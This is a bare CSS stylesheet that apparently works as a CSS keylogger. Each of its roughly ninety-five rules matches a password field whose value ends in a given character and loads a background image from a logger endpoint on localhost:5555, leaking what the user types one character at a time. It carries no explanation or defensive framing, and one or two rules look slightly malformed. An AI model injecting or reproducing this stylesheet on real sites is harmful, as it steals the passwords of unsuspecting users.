input[type="password"][value$=" "] { background-image: url("http://localhost:5555/logger/+"); }
input[type="password"][value$="!"] { background-image: url("http://localhost:5555/logger/%21"); }
input[type="password"][value$="\""] { background-image: url("http://localhost:5555/logger/%22"); }
input[type="password"][value$="#"] { background-image: url("http://localhost:5555/logger/%23"); }
input[type="password"][value$="$"] { background-image: url("http://localhost:5555/logger/%24"); }
input[type="password"][value$="%"] { background-image: url("http://localhost:5555/logger/%25"); }
input[type="password"][value$="&"] { background-image: url("http://localhost:5555/logger/%26"); }
input[type="password"][value$="'"] { background-image: url("http://localhost:5555/logger/%27"); }
input[type="password"][value$="("] { background-image: url("http://localhost:5555/logger/%28"); }
input[type="password"][value$=")"] { background-image: url("http://localhost:5555/logger/%29"); }
input[type="password"][value$="*"] { background-image: url("http://localhost:5555/logger/%2A"); }
input[type="password"][value$="+"] { background-image: url("http://localhost:5555/logger/%2B"); }
input[type="password"][value$=","] { background-image: url("http://localhost:5555/logger/%2C"); }
input[type="password"][value$="-"] { background-image: url("http://localhost:5555/logger/-"); }
input[type="password"][value$="."] { background-image: url("http://localhost:5555/logger/."); }
input[type="password"][value$="/"] { background-image: url("http://localhost:5555/logger/%2F"); }
input[type="password"][value$="0"] { background-image: url("http://localhost:5555/logger/0"); }
input[type="password"][value$="1"] { background-image: url("http://localhost:5555/logger/1"); }
input[type="password"][value$="2"] { background-image: url("http://localhost:5555/logger/2"); }
input[type="password"][value$="3"] { background-image: url("http://localhost:5555/logger/3"); }
input[type="password"][value$="4"] { background-image: url("http://localhost:5555/logger/4"); }
input[type="password"][value$="5"] { background-image: url("http://localhost:5555/logger/5"); }
input[type="password"][value$="6"] { background-image: url("http://localhost:5555/logger/6"); }
input[type="password"][value$="7"] { background-image: url("http://localhost:5555/logger/7"); }
input[type="password"][value$="8"] { background-image: url("http://localhost:5555/logger/8"); }
input[type="password"][value$="9"] { background-image: url("http://localhost:5555/logger/9"); }
input[type="password"][value$=":"] { background-image: url("http://localhost:5555/logger/%3A"); }
input[type="password"][value$=";"] { background-image: url("http://localhost:5555/logger/%3B"); }
input[type="password"][value$="<"] { background-image: url("http://localhost:5555/logger/%3C"); }
input[type="password"][value$="="] { background-image: url("http://localhost:5555/logger/%3D"); }
input[type="password"][value$=">"] { background-image: url("http://localhost:5555/logger/%3E"); }
input[type="password"][value$="?"] { background-image: url("http://localhost:5555/logger/%3F"); }
input[type="password"][value$="@"] { background-image: url("http://localhost:5555/logger/%40"); }
input[type="password"][value$="A"] { background-image: url("http://localhost:5555/logger/A"); }
input[type="password"][value$="B"] { background-image: url("http://localhost:5555/logger/B"); }
input[type="password"][value$="C"] { background-image: url("http://localhost:5555/logger/C"); }
input[type="password"][value$="D"] { background-image: url("http://localhost:5555/logger/D"); }
input[type="password"][value$="E"] { background-image: url("http://localhost:5555/logger/E"); }
input[type="password"][value$="F"] { background-image: url("http://localhost:5555/logger/F"); }
input[type="password"][value$="G"] { background-image: url("http://localhost:5555/logger/G"); }
input[type="password"][value$="H"] { background-image: url("http://localhost:5555/logger/H"); }
input[type="password"][value$="I"] { background-image: url("http://localhost:5555/logger/I"); }
input[type="password"][value$="J"] { background-image: url("http://localhost:5555/logger/J"); }
input[type="password"][value$="K"] { background-image: url("http://localhost:5555/logger/K"); }
input[type="password"][value$="L"] { background-image: url("http://localhost:5555/logger/L"); }
input[type="password"][value$="M"] { background-image: url("http://localhost:5555/logger/M"); }
input[type="password"][value$="N"] { background-image: url("http://localhost:5555/logger/N"); }
input[type="password"][value$="O"] { background-image: url("http://localhost:5555/logger/O"); }
input[type="password"][value$="P"] { background-image: url("http://localhost:5555/logger/P"); }
input[type="password"][value$="Q"] { background-image: url("http://localhost:5555/logger/Q"); }
input[type="password"][value$="R"] { background-image: url("http://localhost:5555/logger/R"); }
input[type="password"][value$="S"] { background-image: url("http://localhost:5555/logger/S"); }
input[type="password"][value$="T"] { background-image: url("http://localhost:5555/logger/T"); }
input[type="password"][value$="U"] { background-image: url("http://localhost:5555/logger/U"); }
input[type="password"][value$="V"] { background-image: url("http://localhost:5555/logger/V"); }
input[type="password"][value$="W"] { background-image: url("http://localhost:5555/logger/W"); }
input[type="password"][value$="X"] { background-image: url("http://localhost:5555/logger/X"); }
input[type="password"][value$="Y"] { background-image: url("http://localhost:5555/logger/Y"); }
input[type="password"][value$="Z"] { background-image: url("http://localhost:5555/logger/Z"); }
input[type="password"][value$="["] { background-image: url("http://localhost:5555/logger/%5B"); }
input[type="password"][value$="\\"] { background-image: url("http://localhost:5555/logger/%5C"); }
input[type="password"][value$="]"] { background-image: url("http://localhost:5555/logger/%5D"); }
input[type="password"][value$="^"] { background-image: url("http://localhost:5555/logger/%5E"); }
input[type="password"][value$="_"] { background-image: url("http://localhost:5555/logger/_"); }
input[type="password"][value$="`"] { background-image: url("http://localhost:5555/logger/%60"); }
input[type="password"][value$="a"] { background-image: url("http://localhost:5555/logger/a"); }
input[type="password"][value$="b"] { background-image: url("http://localhost:5555/logger/b"); }
input[type="password"][value$="c"] { background-image: url("http://localhost:5555/logger/c"); }
input[type="password"][value$="d"] { background-image: url("http://localhost:5555/logger/d"); }
input[type="password"][value$="e"] { background-image: url("http://localhost:5555/logger/e"); }
input[type="password"][value$="f"] { background-image: url("http://localhost:5555/logger/f"); }
input[type="password"][value$="g"] { background-image: url("http://localhost:5555/logger/g"); }
input[type="password"][value$="h"] { background-image: url("http://localhost:5555/logger/h"); }
input[type="password"][value$="i"] { background-image: url("http://localhost:5555/logger/i"); }
input[type="password"][value$="j"] { background-image: url("http://localhost:5555/logger/j"); }
input[type="password"][value$="k"] { background-image: url("http://localhost:5555/logger/k"); }
input[type="password"][value$="l"] { background-image: url("http://localhost:5555/logger/l"); }
input[type="password"][value$="m"] { background-image: url("http://localhost:5555/logger/m"); }
input[type="password"][value$="n"] { background-image: url("http://localhost:5555/logger/n"); }
input[type="password"][value$="o"] { background-image: url("http://localhost:5555/logger/o"); }
input[type="password"][value$="p"] { background-image: url("http://localhost:5555/logger/p"); }
input[type="password"][value$="q"] { background-image: url("http://localhost:5555/logger/q"); }
input[type="password"][value$="r"] { background-image: url("http://localhost:5555/logger/r"); }
input[type="password"][value$="s"] { background-image: url("http://localhost:5555/logger/s"); }
input[type="password"][value$="t"] { background-image: url("http://localhost:5555/logger/t"); }
input[type="password"][value$="u"] { background-image: url("http://localhost:5555/logger/u"); }
input[type="password"][value$="v"] { background-image: url("http://localhost:5555/logger/v"); }
input[type="password"][value$="w"] { background-image: url("http://localhost:5555/logger/w"); }
input[type="password"][value$="x"] { background-image: url("http://localhost:5555/logger/x"); }
input[type="password"][value$="y"] { background-image: url("http://localhost:5555/logger/y"); }
input[type="password"][value$="z"] { background-image: url("http://localhost:5555/logger/z"); }
input[type="password"][value$="{"] { background-image: url("http://localhost:5555/logger/%7B"); }
input[type="password"][value$="|"] { background-image: url("http://localhost:5555/logger/%7C"); }
input[type="password"][value$="\\}"] { background-image: url("http://localhost:5555/logger/%7D"); }
input[type="password"][value$="~"] { background-image: url("http://localhost:5555/logger/~"); }
input[type="password"][value$=""] { background-image: url("http://localhost:5555/logger/%7F"); }

